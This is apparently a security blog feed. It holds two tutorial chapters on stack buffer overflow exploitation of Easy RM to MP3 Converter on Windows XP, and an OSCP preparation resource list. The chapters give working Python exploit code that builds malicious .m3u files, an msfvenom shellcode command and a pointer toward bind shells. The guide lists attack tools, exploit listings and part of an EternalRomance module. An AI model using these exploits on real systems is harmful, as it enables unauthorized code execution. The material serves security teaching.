:~# ./chapt2

Welcome back! In the previous chapter, we focused on the basics of reverse engineering, and gained control of the EIP register using our first binary. Now, let’s dive into the fun stuff: shellcoding!

So, two things need to be done now:

1) Place shellcode in ESP (Basically an encoded payload. For example, bind shell or cmd exec.)

2) Replace EIP with a JMP instruction that points to our shellcode in ESP. A JMP instruction will jump to the shellcode and execute it.

First, in order to make sure that all of our shellcode is going into ESP, let’s send a recognisable pattern. This way, we will be able to notice if some of our shellcode is getting cut, which can render our exploit unusable. I’ll be using the pattern from the Corelan website itself:

import os
import sys
f = open("lol.m3u","w+")
junk1 = "A"*(25000+1075)
eip = "BBBB"
buf = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK"
buf += "5ABCDEFGHIJK6ABCDEFGHIJK"
buf += "7ABCDEFGHIJK8ABCDEFGHIJK"
buf += "9ABCDEFGHIJKAABCDEFGHIJK"
buf += "BABCDEFGHIJKCABCDEFGHIJK"
junk2 = "C"*(30000 - len(junk1 + eip + buf))
string = junk1 + eip + buf + junk2
print(len(string))
f.write(string)
f.close()

Let’s save the file and put it through the debugger.

So the highlighted value is what is in ESP. As you can see, our pattern is missing 4 bytes (1ABC), which means that the shellcode that’s going in ESP is incomplete. This has a simple solution, all we have to do is add 4 bytes before our shellcode. I’ll name this variable preesp.

import os
import sys
f = open("lol.m3u","w+")
junk1 = "A"*(25000+1075)
eip = "BBBB"
preesp = "XXXX"
buf = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK"
buf += "5ABCDEFGHIJK6ABCDEFGHIJK"
buf += "7ABCDEFGHIJK8ABCDEFGHIJK"
buf += "9ABCDEFGHIJKAABCDEFGHIJK"
buf += "BABCDEFGHIJKCABCDEFGHIJK"
junk2 = "C"*(30000 - len(junk1 + eip + preesp + buf))
string = junk1 + eip + preesp + buf + junk2
print(len(string))
f.write(string)
f.close()

Let’s put this through the debugger :)

Now, let’s look for a JMP ESP instruction. This instruction should belong to one of the application’s DLL. Immunity will help us with this hunt :)

Run the program but do nothing, and right click anywhere in the CPU window and click on Search for > All commands in all modules. Like so:

Alright! Our test shellcode is going in just fine. Now, let’s look for a jump ESP instruction.

Right-click anywhere in the CPU window, and search for all commands in all modules. Like so:

Enter jmp esp in the popup box and click find.

This instruction looks good. Copy the address, and then click on View in the toolbar, and click CPU to go back to the CPU window.

Now, replace the 4 Bs in your code with this address. But remember one thing, this highlighted address is in the big Endian format. Computers can’t read the address in in our code if we send it in big Endian. We need to change it into little Endian, which is the reverse of this (i.e. 3AF2D201). This is how we will include that address in our code:

eip = "\x34\xF2\xD2\x01"

Now, let’s generate some shellcode! I’m going to generate shellcode that will open the Calculator application (calc.exe) in Windows XP, just as a test. If this works, we can put a bind shell one in. For this, we will be using Metasploit.

msfvenom -a x86 --platform windows -p windows/exec CMD="calc" --encoder x86/alpha_upper -f py

The ‘–encoder’ flag selects an encoder, in our case it’s x86/alpha_upper. The ‘-f’ flag tells it to print the payload for a python file. Now, let’s add some NOPS (No operations, 90) and paste this in our code and watch the magic!

Your final code should look something like this:

import os
import sys
f = open("lol.m3u","w+")
junk1 = "A"*(25000+1075)
eip = "\x3A\xF2\xD2\x01"
preesp = "XXXX"
nops = "\x90"*25
buf = ""
buf += "\xd9\xe9\xd9\x74\x24\xf4\xbb\xcb\x65\x09\xdf\ #..... and so on
buf3 = "C"*(30000 - len(junk1 + eip + preesp + nops + buf))
string = junk1 + eip + preesp + nops + buf + buf3
print(len(string))
f.write(string)
f.close()

Congratulations on your first successful exploit! Now, I want you to try and replace the calculator shellcode with a windows bind shell shellcode and get a shell. In the next chapter, we will cover more ways in which we can execute our shellcode. We will see the other instructions that can replace our JMP ESP instruction.

Reverse Engineering and Exploit Development Made Easy - Chapter 1

Mon, 01 Jul 2019 00:00:00 +0000

Reverse Engineering and Exploit Development Made Easy - Chapter 1

Stack Control

:~# whoami

So before we get to the fun stuff, I would like to take some time to introduce myself.

I’m 4p0cryph0n, your run-of-the-mill cyber security junkie! Cyber security has played a huge role in my life and who I am as a person, as I’ve been doing it since I was in my early teens.

I’ve always looked forward to learning new techniques to boost my repertoire, and even like sharing some knowlege. Before we begin with the introduction, I would also like to thank all the admins and the NetSec Focus team as a whole, for providing us with a really amazing platform where we can share knowledge with eachother, and grow as a cyber security community. Kudos guys!

:~# uname -a

The objective of this series is to make Reverse Engineering and Exploit Development easy to understand. I mean, who would’nt want to be a l33t hackerman right?! We will select multiple learning resources, methods, and knowledge bases (like corelan.be, fuzzysecurity etc) to make sure that you guys, and me of course, grasp on to every single concept and learn something new with every completed chapter.

Since the motto has always been ‘Try Harder’, things will get hard here, but I assure you that it will be all worth it in the end. But don’t feel left out here, I’ll be learning with you guys!

:~# configure

So, first steps bois. We will go over the resources in chronological order, so feel free to do some pre-reading and research before you go over this post. A few extra hours will only sharpen your skills!

We will start with the most basic type of exploit dev in the first chapter ie. Stack Buffer Overflows. Also, keep in mind that my ways can be slightly different from the ones used in the resources, so is to demonstrate that each technique can be executed in n number of ways. Creativity is your best friend here!

Journey from Noob to Pro

Chapter 1: Stack Based Overflows

:~# ./CoolStuff

Hey guys, welcome to chapter 1! The resource that we will be using is corelan.be, a really valuable resource for exploit development knowledge. Just a little overview before we begin, the idea here is to overflow the EIP pointer to point to a specific location in the stack. This location will have our desired payload.

If you’re still very new to how things work in memory, I will recommend that you read the explanation given on corelan.be exploit tutorial 1. It will explain the fundamentals of the stack, and most pointers that concern us for now.

With that being said, let us dive right in!

:~# ./Setup

Okay, we will need two machines to replicate this scenario: a victim, and an attacker machine. This first lesson will focus on exploiting a binary that is made for Windows XP. I will be using SP3 on my VM. Also, note that we will be using 32 bit to learn the basics of reverse engineering. My attacker machine is Linux. I will recommend Kali because it has Metasploit and many other tools pre-installed.

The binary that we will be exploiting is Easy RM To MP3 converter, specifically version 2.7.3.700. You can download this particular one from the corelan.be site on the post Exploit Tutorial Part 1, all you’ll have to is make an account.

The debugger that I’ll be using is Immunity Debugger. You can use WinDbg or OllyDbg as well.

:~# ./BufOverflow

The Corelan developers have used Perl as their choice of language but I’ll be using Python, as I’m more comfortable with it.

So, let’s start off by analysing the UI of this application:

From my research on this application, it converts .m3u files to .mp3. Only problem? This application puts data directly onto the stack. If we overflow/crash it just right, we will be able to manipulate the stack and its pointers to our liking.

One thing to note: You will NOT find such vulnerabilities in this day and age, as this was a vulnerability from the early 2000s. Things like stack protection, ASLR and DEP, and other ways to counter this vulnerability have already been introduced. But this exploit will help us in understanding the fundamentals of Exploit Development and Reverse Engineering. So, don’t take this lightly!

Let’s do a quick test. I wrote some code to write 20000 As to an m3u file. This is a completely random number. Let’s run this code!

import os
import sys

f = open("lol.m3u","w+")
trash = "A"*20000
f.write(trash)
f.close()

Now let’s transfer this .m3u to the victim machine and load the file. I’m using the drag and drop feature in Virtualbox but you can alternatively used the shared folders feature.

Okay, we haven’t crashed the application yet, and the program has handled our exception successfully. Let’s reopen our application and try with 30000 As.

And it’s crashed. So, we know how to crash it now, but what good does that do? We need to crash it in our desired way. Think of it like orchestrated chaos ;)

Now let’s fire the debugger up and see what’s under the hood. Click on File > Open and select the app. Then, click on the play button and load your file like normal.

A quick look at the registers shows us that EIP has the value of 41414141 (AAAA).

EIP is an instruction pointer, holds the address of the next instruction that must be executed. As 41414141 is not a valid address for an instruction, you will see a text that says Access violation when executing [41414141] at the bottom.

Also, we can see that we have also filled the register ESP with our As. ESP is a stack pointer that points to the top of the stack. It holds data.

Shift your vision to the stack window as well, this will also tell us the ESP and EIP are filled with our As. The value that is currently highlighted shows the data in ESP.

Now, we need to find something called an offset. This is the number of bytes we need to overflow the stack by, to reach a specific location. Think of it like filling a beaker with a solution. You need to reach the 150 cm³ mark, so you will only fill until you reach that mark.

We need to find the offset for EIP, so that at the end of this, we can write our desired instruction to EIP. Our final structure should look like this: AAAAAAAAAAAAAAA....BBBBCCCCCCCCCCCCCC......

The As will be filled until we reach EIP, EIP will hold four Bs for us, and then to balance everything out, the rest needed to cause a crash will be a bunch of Cs. This technique is refered to as gaining EIP control.

So to make this process easier, I’ll further divide our 30000 As into 25000 As and 5000 Bs. This will help us understand wether we reach EIP within our As or our Bs.

import os
import sys

f = open("lol.m3u","w+")
trash = "A"*25000
trash = "B"*5000
f.write(trash+trash2)
f.close()

Now, let’s generate the file and load it within the debugger.

Okay great, as EIP has the value of 42424242 (BBBB), it tells us that somewhere in our 5000 Bs EIP has already been reached.

To determine the exact position of EIP, we will use a pattern. Think of it like

A123B123C123D123. This is a pattern right? So if EIP contains C123 for example, I’ll instantly know that it takes 8 bytes to reach EIP, and the rest after that can be junk.

Your kali box comes with two very important tools for this: pattern_create.rb and pattern_offset.rb. So let’s generate a unique pattern of length 5000 and use that in our script.

/usr/share/metasploit-framework/tools/pattern_create.rb -l 5000

Let’s generate the file with metasploit and load it within the debugger.

As I said before, the one that is highlighted in green is the value stored in ESP. If you go one address up in the stack window, you will see what’s stored in EIP. J8bj in my case. Now, let’s find out how many bytes did it take to reach EIP using pattern_offset.rb.

/usr/share/metasploit-framework/tools/pattern_offset.rb -q j8bj

I get the offset as 1075. So now, my final structure will look something like this:

"A"*(25000+1075) + "BBBB" + "C"*(30000-((25000+1075) + 4)

import os
import sys

f = open("lol.m3u","w+")
junk1 = "A"*(25000+1075)
eip = "BBBB"
junk2 = "C"*(30000-(len(junk1+eip)))
crash = junk1 + eip + junk2
f.write(crash)
f.close()

Now, let’s see if our Math game is strong ;)

Yess! We now have control of the EIP which determines the next instructions to be executed. If you made it this far give yourself a pat on the back! In the next chapter we’ll be generating and placing shellcode then with our control over EIP executing our payload.

The Journey to Try Harder: TJnull’s Preparation Guide for PWK/OSCP

Fri, 29 Mar 2019 00:00:00 +0000

Overview
Dedication
A Word of Warning!
Section 1: Getting Comfortable with Kali Linux
Section 2: Essential Tools in Kali
Section 3: Passive Reconnaissance
Section 4: Active Reconnaissance
Section 5: Vulnerability Scanning
Section 6: Buffer Overflows
Section 7: Handling Public Exploits
Section 8: Transferring Files to your target
Section 9: Privilege Escalation
Section 10: Client-Side Attacks
Section 11: Web Application Attacks
Section 12: Password Cracking
Section 13: Port Redirection and Pivoting
Section 14: Metasploit Framework
Section 15: Antivirus Bypassing
Extra Resources
Setting up your Pentesting Environment
Wargames/Hands-on Challenges
Capture the Flag Competitions (CTFs)/Cyber Competitions
Bug Bounty Programs
Vulnerable Machines
Tips to participate in the Proctored OSCP exam
Other Resources
Conclusion

Overview:

For the past 4 years of my life I had one goal: Pass OSCP on my first try. I started by reviewing the course syllabus and I realized there were some things that I did not know, which made me nervous to start the course. So, I went through a variety of resources until I thought I was ready to begin. This guide contains those resources and my advice to prepare for your adventure to take the PWK/OSCP!

Dedication:

A big shout out goes to abatchy! Without his guide I would have never started exploring for other resources. Thank you for creating your original guide: https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob

I also want to thank the following people for taking the time to read this guide:

Rey Bango
Tunny Traffic aka VCSEC. A moderator at Netsec Focus
G0t Mi1k
The team at Offensive Security

This guide has been approved by Offensive Security!

A Word of Warning!:

Do not expect these resources to be the main thing you use for obtaining OSCP. When you are ready to take the course, you should expect the following:

Spending a lot of time researching.
Do not expect the admins or even other students to give you answers easily.
Plan to make a commitment to this and have an open mindset to learning new things.
Know your tools! There are certain tools that you cannot use for the exam. However, that does not mean you should skip over them. Take some time to understand them because you may have to use them on an actual engagement or in the field.
Remember Offensive Security motto: TRY HARDER

As of now Offensive Security has restricted the following tools:

Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
Automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc.)
Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Canvas, Core Impact, SAINT, etc.)
Features in other tools that utilize either forbidden or restricted exam limitations

Reference: https://support.offensive-security.com/oscp-exam-guide/

Course Syllabus:

The 2nd most important resource that I used to help me prepare for the course: https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf

Getting Comfortable with Kali Linux
Essential Tools in Kali
Passive Reconnaissance
Active Reconnaissance
Vulnerability Scanning
Buffer Overflows
Working with Public Exploits
File Transfer
Privilege Escalation
Client-Side Attacks
Web Application Attacks
Password Attacks
Tunneling/Pivoting
Introduction to the Metasploit Framework
Antivirus Bypassing

Section 1: Getting Comfortable with Kali Linux

Kali Linux Revealed and Online Course: A good foundational course that helped me understand more about Kali Linux and it has a nice Linux Fundamentals section as well.

Book Link: https://kali.training/downloads/Kali-Linux-Revealed-1st-edition.pdf
Online Course Link: https://kali.training/lessons/introduction/

Bash Scripting: The bash Guide: A good guide to get you into the bash scripting

https://guide.bash.academy/

Linux Journey: A huge guide to learn about a variety of different things in Linux. All the lessons are free.

https://linuxjourney.com/

https://www.explainshell.com/

Hands on challenge to get comfortable with Linux:

Overthewire Bandit: https://overthewire.org/wargames/bandit/
Cmdchallenge.com: https://cmdchallenge.com/
HackerRank Linux Shell: https://www.hackerrank.com/domains/shell

Books:

The Linux Command Line (2nd Edition is coming soon!): https://nostarch.com/tlcl2
Linux for Hackers: https://nostarch.com/linuxbasicsforhackers

Section 2: Essential Tools in Kali

Netcat: The TCP/IP Swiss Army tool. Experiment with this tool and understand what it does because you will be using this almost every day during the time in your course.

SANS Netcat Cheatsheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

Ncat: A better version of netcat in my opinion. Supports SSL communication and it is part of Nmap.

TCPDump: Command line base Network Analysis Tool. Very useful and good to know if you are on a system that does not have a gui interface. Here is a good cheat sheet I used for tcpdump when I needed to troubleshoot my exploits: https://www.andreafortuna.org/technology/networking/tcpdump-a-simple-cheatsheet/

Daniel Miessler TCPDump Guide: https://danielmiessler.com/study/tcpdump/

Wireshark: GUI based Network Analysis tool. There a lot of free PCAP’s samples online that you can use to understand how Wireshark works. Be careful with downloading some of these PCAP files because they may contain malware on them :D

PCAP Samples:

Netresec: https://www.netresec.com/?page=pcapfiles
Malware Traffic Analysis: https://www.malware-traffic-analysis.net/
Packettotal (Just like virustotal but for PCAP Analysis): https://packettotal.com/

Section 3: Passive Reconnaissance

Take some time to learn about these tricks and techniques. They will certainly come in handy!

Google Dorks: Using various google searches that you can find that may expose sensitive information about a target.

SANS Google Dork Cheatsheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf
Google Hacking Database: https://www.exploit-db.com/google-hacking-database
Netcraft: https://netcraft.com/

Email Harvesting:

theharvester: https://github.com/laramies/theharvester
recon-ng: https://bitbucket.org/LaNMaSteR53/recon-ng/overview

Additional Resources: Tools I did not use in the lab but I used them for preparation and they have come in handy for other tests.

Domaintools: http://whois.domaintools.com/
MX Toolbox: https://mxtoolbox.com/DNSLookup.aspx

Section 4: Active Reconnaissance

Tools for DNS Enumeration:

Dnsrecon Created by Darkoperator: https://github.com/darkoperator/dnsrecon

Network Scanning:

Nmap Official Guide: I used this more than the man pages. I highly recommend purchasing the full book since the official guide is missing a few chapters, such as “Detecting and Subverting Firewalls and Intrusion Detection Systems”, “Optimizing Nmap Performance”, “Port Scanning Techniques and Algorithms”, “Host Discovery (Ping Scanning)”, and more. https://nmap.org/book/toc.html
Link for Nmap Network Scanning Book (if you want to purchase it): https://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717
SANS Nmap Cheatsheet: https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.1.pdf
Nmap Scripting Engine (NSE): https://nmap.org/book/man-nse.html
ZephrFish Nmap Blog: https://blog.zsec.uk/nmap-rtfm/

Service Enumeration:

Abatchy provided a link from 0day security that gave me a lot of ideas and things to look for that I may have missed when I skipped some the of the services in the lab. You can find that resource here: http://0daysecurity.com/penetration-testing/enumeration.html

Highoncoffee Penetration Testing Cheatsheet: https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/

Section 5: Vulnerability Scanning

I did not spend too much time in this section for preparation because vulnerability scanners are simple and easy to configure. In addition, the purpose of a vulnerability scanner is to identify security holes in services or in a operating system. These scanners rely on a database that contains the necessary information needed to conduct a scan. A word of caution! Be careful when you use vulnerability scanners on your targets because there is a chance that some of the plugins or features can cause an impact to your target such as taking down that service, locking out user accounts, and even crash the system. In the syllabus the tool recommends that you use OpenVAS since it is a full-featured vulnerability scanner. However, there are other vulnerability scanners out there and I highly recommend playing with Nessus: https://www.tenable.com/products/nessus/nessus-professional

The reason why I am stating that you should use Nessus is because it is more stable on Kali Linux and it has simple straightforward interface. I also was able to use the Nessus Home key for most of my testing and to help me get more familiar with how these vulnerability scanners work. Nessus is a real popular tool for vulnerability scanning in the infosec world and I certainly encourage you to play with it!

For instructions on how to install Nessus on Kali Linux you can find it here: https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux

For obtaining a Nessus key you can grab one here: https://www.tenable.com/products/nessus-home

Section 6: Buffer Overflows

Windows Binaries (Recommend that you run these on Windows 7/XP 32 bit):
Vulnserver: https://samsclass.info/127/proj/vuln-server.htm
Minishare 1.4.1: https://www.exploit-db.com/exploits/636
Savant Web Server 3.1: https://www.exploit-db.com/exploits/10434
Freefloat FTP Server 1.0: https://www.exploit-db.com/exploits/40673
Core FTP Server 1.2: https://www.exploit-db.com/exploits/39480

Linux Binaries:

Linux Buffer Overflow: https://samsclass.info/127/proj/lbuf1.htm

Vulnerable Boxes:

Brainpan 1: https://www.vulnhub.com/entry/brainpan-1,51/
Pinky’s Palace version 1: https://www.vulnhub.com/entry/pinkys-palace-v1,225/

Other Resources:

Whitepaper Introduction to Immunity Debugger: https://www.sans.org/reading-room/whitepapers/malicious/basic-reverse-engineering-immunity-debugger-36982
Buffer Overflows for Dummies: https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
Vortex Stack Buffer Overflow Practice: https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
Smashing the Stack For Fun and Profit: http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf

Section 7: Handling Public Exploits

Places to find exploits:

Tools for finding exploits:

Searchsploit: a command line search tool for Exploit-DB that has a repo of Exploit Database with you.

Command Examples:

searchsploit MS-17-010: finds all cases/exploits linked to MS17-010

root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                     |  Path
                                                                                                   | (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution  | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                      | exploits/windows/dos/41891.rb
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)      | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)           | exploits/windows/remote/42031.py
Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution  | exploits/windows/remote/42315.py
Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | exploits/windows_x86-64/remote/42030.py
--------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

root@kali:~# searchsploit -x /usr/share/exploitdb/exploits/windows/remote/43970.rb

Snippet of the exploit: 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
#  Local Security Settings >
#   Local Policies >
#    Security Options >
#     Network Access: Sharing and security model for local accounts

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution',
      'Description'    => %q{
        This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
        primitive. This will then be used to overwrite the connection session information with as an
        Administrator session. From there, the normal psexec payload code execution is done.

        Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
        Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
        exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
        named pipe.
        

Play with some of the other command switches that Searchsploit has because it will make it much easier for you to find exploits on your kali box.

Section 8: Transferring Files to your target:

Awakened: Transfer files from Kali to the target machine https://awakened1712.github.io/oscp/oscp-transfer-files/
Ropnop Transferring Files from Linux to Windows (post-exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/

One tool that I also found interesting to transfer files on windows systems is using bitsadmin. The tool is a command-line tool that you can use to create download or upload jobs and monitor their progress. You can find examples on how to use the tool here: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin-examples

Another tool you can check out is Impacket. This tool contains a variety of programming classes that you can use to interact with target networks to parse raw data or you can be able to use their scripts to transfer files to or from your target host.

Also check out python modules like these:

Python -m SimpleHTTPServer 80: Spins up a webserver in the directory you are located on port 80.
Python3 -m http.server 80: Spins up a python version 3.X web server in the directory you are located on port 80.
Python -m pyftpdlib -p 21 -w: spins up a FTP server in the directory you are located on port 21 and it allows anonymous login access.
Python3 -m pyftpdlib -p 21 -w: spins up a Python 3.X FTP server in the directory you are located on port 21 and it allows anonymous login access.

Section 9: Privilege Escalation

In this section you will find a lot of techniques that range from getting administrative access from a kernel exploit or through a misconfigured service. The possibilities are endless, and make sure you find the ones that will work for you. In order to get an understanding of this section I recommend applying your knowledge through Vulnhub or Hackthebox to improve your skills in this area. I know there are scripts for automating this process but at some points those scripts can miss something very important on your target that you need to escalate your privileges. Something you should keep in mind :D.
For this section I am going to break into two parts: Windows and Linux Privilege Escalation Techniques.

Windows Privilege Escalation Guides:

Fuzzysecurity Windows Privilege Escalation Fundamentals: Shout out to fuzzysec for taking the time to write this because this is an amazing guide that will help you understand Privilege escalation techniques in Windows. http://www.fuzzysecurity.com/tutorials/16.html
Pwnwiki Windows Privilege Escalation Commands: http://pwnwiki.io/#!privesc/windows/index.md
Absolomb’s Security Blog: Windows Privilege Escalation Guide https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Pentest.blog: Windows Privilege Escalation Methods for Pentesters https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

Windows Privilege Escalation Tools:

JAWS (Created by 411Hall): A cool windows enumeration script written in PowerShell. https://github.com/411Hall/JAWS/commits?author=411Hall
Windows Exploit Suggester (Created by GDSSecurity): A python script that compares target patch against Microsoft vulnerability database to detect any missing patches on the target. https://github.com/GDSSecurity/Windows-Exploit-Suggester
Windows Exploit Suggester Next Generation: https://github.com/bitsadmin/wesng
Sherlock (Created by RastaMouse): Another cool PowerShell script that finds missing software patches for local privilege escalation techniques in Windows. https://github.com/rasta-mouse/Sherlock
Other Resources for Windows Privilege Escalation Techniques: https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194

Linux Privilege Escalation Tools:

LinEnum: A great Linux privilege escalation checker that is still maintained by the guys at rebootuser.com. You can find there tool here: https://github.com/rebootuser/LinEnum

Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2

Section 10: Client-Side Attacks

Section 11: Web Application Attacks

This section is the one I spent most of time preparing for PWK and OSCP. In this section you need to understand the following web attacks:

cross-site scripting (XSS): OWASP:https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
SQL Injections: OWASP: https://www.owasp.org/index.php/SQL_Injection
Pentest Monkey SQL Cheat Sheets: http://pentestmonkey.net/category/cheat-sheet/sql-injection
File Inclusion Vulnerabilities. https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/

Tools for finding Web Vulnerabilities and conducting Web Attacks:

Burp Suite:

A popular web application vulnerability scanner that contains a variety of features and plugins to identify web vulnerabilities on certain web applications. The tool uses an interception proxy that connects to your browser to route traffic through the Burp Suite proxy client. Once the interception proxy is configured you can start capturing and analyzing each request to and from the target web application. With these’s captured requests a penetration tester can analyze, manipulate, and fuzz individual HTTP requests in order to identify potential parameters or injection points manually.

Bugcrowd University has a webinar that Jason Haddix created explaining about burp suite and how you can use it. You can find this recording here: https://www.bugcrowd.com/resource/introduction-to-burp-suite/

SQL Injection Tools: I would not recommend using these tools until you have a clear understaning about SQL Databases and how a SQL Injection works. These tools below make it easy to automate the process for conducting a SQL Injection but it is possible that they can causes issues to a targets SQL Database. Here are a list of tools that I have played with to get a better understanding of how you can automate SQL Injections:

SQLmap: https://github.com/sqlmapproject/sqlmap/wiki/Usag
NoSQLMap: https://github.com/codingo/NoSQLMap
SQLNinja: http://sqlninja.sourceforge.net/

Nikto (Created by Chris Sullo): A web server scanner which performs comprehensive tests against web servers for multiple items. This tool can be able to scan for vulnerbalilities on the web application, checks for server configuration that include multiple index files, HTTP server options, and will attempt to identify installed the version of the web server, and any plugins/software that is running on it. Please keep this in mind that this tool is can be very noisy when scanning a targets web server.

Link: https://cirt.net/Nikto2

Web Directory Scanners:

These tools are designed to brute force site structure including directories and files in websites. These tools can be able to identify hidden directory scrtuctures or webpages that can come in handy when you are in the labs or during your assessment.

Dirsearch: https://github.com/maurosoria/dirsearch
Dirbuster: https://tools.kali.org/web-applications/dirbuster
Gobuster: https://github.com/OJ/gobuster
Wfuzz: https://github.com/xmendez/wfuzz

Hands on areas to improve your web attack skills:

Metasploitable 2: Contains Vulnerable Web Services such as Multidae and the Damn Vulnerable Web App (DVWA) that you can use to improve your web skills.

Link to download the machine: https://metasploit.help.rapid7.com/docs/metasploitable-2

Backup Link: https://www.vulnhub.com/entry/metasploitable-2,29/

Exploitability Guide: https://metasploit.help.rapid7.com/docs/metasploitable-2-exploitability-guide
OWASP Juice Shop: Another vulnerable web application that contains a variety of challenges to improve your web skills. https://www.owasp.org/index.php/OWASP_Juice_Shop_Project
Overthewire Natas: A set of wargame challenges that are web base that you will need to complete in order to move to the next round. I really enjoyed their challenges when I did them! http://overthewire.org/wargames/natas/
Other resources: Hack This Site: https://www.hackthissite.org/

Section 12: Password Cracking

Introduction to Password Cracking: https://alexandreborgesbrazil.files.wordpress.com/2013/08/introduction_to_password_cracking_part_1.pdf

Offline Tools for Password Cracking:

Hashcat: https://hashcat.net/hashcat/ Sample Hashes to test with Hashcat: https://hashcat.net/wiki/doku.php?id=example_hashes
John the Ripper: https://www.openwall.com/john/
Metasploit Unleashed using John the Ripper with Hashdump: https://www.offensive-security.com/metasploit-unleashed/john-ripper/

Online Tools for Password Cracking:

THC Hydra: https://github.com/vanhauser-thc/thc-hydra
Medusa: http://h.foofus.net/?page_id=51

Wordlist generators:

Cewl: https://digi.ninja/projects/cewl.php
Crunch: https://tools.kali.org/password-attacks/crunch

Wordlists:

In Kali: /usr/share/wordlists
Seclists: apt-get install seclists You can find all of his password lists here: https://github.com/danielmiessler/SecLists/tree/master/Passwords

Online Password Crackers:

I usually went for these first to see if they had the hash cracked in their database. However, don’t use these online crackers as your main tools for everything. Uploading a hash from an engagement can be a huge risk so make sure you use your offline tools to crack those types of hashes. Here is a list of online hash crackers that I found online that you can use to crack hashes:

Other Resources for Password Cracking:

Pwning Wordpress Passwords: https://medium.com/bugbountywriteup/pwning-wordpress-passwords-2caf12216956

Section 13: Port Redirection and Pivoting

Abatchy’s Port Forwarding Guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide
Windows Port Forwarding: http://woshub.com/port-forwarding-in-windows/
SSH Tunneling Explained: https://chamibuddhika.wordpress.com/2012/03/21/ssh-tunnelling-explained/
Understanding Proxy Tunnels: https://www.offensive-security.com/metasploit-unleashed/proxytunnels/
Understanding Port forwarding with Metasploit: https://www.offensive-security.com/metasploit-unleashed/portfwd/
Explore Hidden Networks with Double Pivoting: https://pentest.blog/explore-hidden-networks-with-double-pivoting/
0xdf hacks stuff. Pivoting and Tunneling: https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html

Tools to help you with Port Forwarding and Pivoting:

Proxychains: https://github.com/haad/proxychains
Proxychains-ng: https://github.com/rofl0r/proxychains-ng
SSHuttle (Totally Recommend learning this): https://github.com/sshuttle/sshuttle
SSHuttle Documentation: https://sshuttle.readthedocs.io/en/stable/

Vulnerable systems to practice pivoting:

Wintermute: https://www.vulnhub.com/entry/wintermute-1,239/

Section 14: Metasploit Framework

The only guide that I used to learn more about Metasploit is Offensive Security Metasploit Unleashed course…which is free! https://www.offensive-security.com/metasploit-unleashed/

Other Resources: Metasploit The Penetration Tester’s Guide (A super awesome book to read): https://nostarch.com/metasploit

Msfvenom Cheat Sheets:

Section 15: Antivirus Bypassing

Tools to play with Anti-Virus evasion: Veil-Framework: https://github.com/Veil-Framework/Veil

Extra Resources

This concludes the resources I have used that helped me understand the course syllabus. Now I will share with you some tips and extra resources that I used during my preparation for the PWK/OSCP.

Setting up your Pentesting Environment:

https://images.offensive-security.com/pwk-kali-vm.7z

Keep in mind that Offensive Security does update their images from time to time. Personally, I only used their image for completing the lab exercises and I had a separate Kali Linux image that I customized to use for the labs and exam.

Wargames/Hands-on Challenges:

I know I stated theses before but I am going to reiterate this:

OverTheWire Bandit: A good set of fun Linux challenges to get yourself familiarizes with bash and Linux. Abatchys walkthrough really helped me here:

Bandit 1-5: https://www.abatchy.com/2016/10/overthewire-bandit-0-5
Bandit 6-10: https://www.abatchy.com/2016/10/overthewire-bandit-6-10
